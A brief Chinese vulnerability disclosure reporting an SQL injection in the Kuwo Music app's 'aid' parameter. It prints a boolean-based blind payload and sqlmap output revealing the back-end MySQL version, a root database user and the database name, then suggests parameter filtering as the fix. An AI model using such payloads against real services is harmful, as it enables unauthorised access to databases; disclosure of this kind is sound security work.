酷我音乐APP一处SQL注入漏洞

  • 2022-03-14 08:34:00

  酷我音乐APP一处SQL注入漏洞

  *****300&type=guid&_=1478935789&*****

  注入点:aid

酷我音乐APP一处SQL注入漏洞

  sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests:

  ---

  Parameter: aid (GET)

  Type: boolean-based blind

  Title: AND boolean-based blind - WHERE or HAVING clause

  Payload: aid=2078300) AND 2825=2825 AND (5697=5697&type=guid&_=1478935789pid=5901124&uid=21259663

  ---

  web application technology: JSP

  back-end DBMS: MySQL >= 5.0.2

  current user: 'root@192.168.298.15'

  current database: 'MLOG'

  仅作验证,请尽快修复!

  修复方案:

  参数过滤

猜你喜欢